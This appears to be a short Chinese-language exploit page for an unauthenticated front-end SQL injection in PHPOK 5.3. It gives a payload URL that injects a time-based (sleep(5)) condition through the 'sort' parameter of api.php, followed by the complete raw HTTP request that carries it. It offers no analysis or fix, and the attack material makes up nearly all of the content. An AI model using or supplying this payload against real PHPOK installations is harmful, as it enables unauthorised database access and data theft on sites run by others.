# PHPOK 5.3 前台無限制注入漏洞
==Payload==
http://0-sec.org/api.php?c=project&f=index&token=1234&id=news&sort=(sleep(5))
==Request==
GET /api.php?c=project&f=index&token=1234&id=news&sort=(sleep(5)) HTTP/1.1 Host: phpok5_3_147 Pragma: no-cache Cache-Control: no-cache Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3833.131 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7 Cookie: PHPSESSION=l87bngd1u307g20iudfmphisu4; XDEBUG_SESSION=PHPSTORM Connection: close
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
请登录后查看评论内容